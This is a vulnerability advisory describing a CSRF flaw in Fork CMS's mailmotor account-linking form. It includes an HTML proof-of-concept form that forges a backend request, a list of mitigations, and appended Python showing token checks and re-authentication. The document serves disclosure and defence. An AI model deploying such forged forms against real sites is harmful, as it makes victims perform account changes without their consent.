====================================================================================
Fork-CMS CSRF:
Introduction
Author: Rafay Baloch
CSRF or XSRF (Cross-Site Request Forgery) occurs when an attacker forces the
victim's browser to send a forged request, making the victim perform a
particular action without intending to. Any form missing CSRF tokens is
vulnerable to it.
Impact:
An attacker can accomplish multiple things; for example, he could change the
victim's form details.
PROOF OF CONCEPT:
The following two forms are missing CSRF tokens.
The account-settings form below is missing a CSRF token, which means an
attacker can force a logged-in user to link a Campaign Monitor account.
http://demo.fork-cms.com/private/en/mailmotor/settings?token=true#tabSettingsAccount
POC:
<html>
<body>
<form action="http://demo.fork-cms.com/backend/ajax.php" method="POST">
<input type="hidden" name="fork[module]" value="mailmotor" />
<input type="hidden" name="fork[action]" value="link_account" />
<input type="hidden" name="fork[language]" value="en" />
<input type="hidden" name="url" value="www.google.com" />
<input type="hidden" name="username" value="rafaybaloch" />
<input type="hidden" name="password" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
http://demo.fork-cms.com/private/en/settings/email
http://demo.fork-cms.com/backend/ajax.php
Mitigations:
- Re-authenticate the user before he performs an important action on his
account, e.g. deleting a user or deleting his own account.
- Add a CSRF token to each and every request and make sure that it is
validated on the server.
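The two mitigations above, as an added illustration that is not Fork CMS code: a per-session synchronizer token checked in constant time, plus a re-authentication window for sensitive actions. The action names, the session layout and the sample form (modelled on the PoC above) are assumptions for the example.

```python
import hmac
import secrets
import time

# Hypothetical actions gated behind re-authentication (mirrors the "delete a user" example).
SENSITIVE_ACTIONS = {"delete_user", "link_account"}
REAUTH_WINDOW_SECONDS = 300


def issue_csrf_token(session):
    """Generate a per-session synchronizer token and store it server-side."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session, form):
    """Compare the submitted token with the session's token in constant time."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False  # a forged cross-site form cannot know the token, so it has none
    return hmac.compare_digest(expected, submitted)


def reauth_fresh(session, now):
    """True if the user re-entered their password within the re-auth window."""
    return now - session.get("reauth_at", 0) <= REAUTH_WINDOW_SECONDS


def handle_ajax(session, form, now=None):
    """Gate a state-changing backend action with both mitigations; returns (status, message)."""
    now = time.time() if now is None else now
    if not csrf_token_valid(session, form):
        return 403, "missing or invalid CSRF token"
    action = form.get("fork[action]", "")
    if action in SENSITIVE_ACTIONS and not reauth_fresh(session, now):
        return 401, "re-authentication required"
    return 200, "action %s accepted" % action


# Constructed sample request shaped like the advisory's forged form: no token field at all.
FORGED_FORM = {"fork[module]": "mailmotor", "fork[action]": "link_account",
               "fork[language]": "en", "url": "www.google.com",
               "username": "attacker", "password": ""}

if __name__ == "__main__":
    session = {"user": "admin", "reauth_at": time.time()}
    print(handle_ajax(session, FORGED_FORM))                      # rejected: 403
    token = issue_csrf_token(session)                             # token rendered into the real form
    print(handle_ajax(session, dict(FORGED_FORM, csrf_token=token)))  # accepted: 200
```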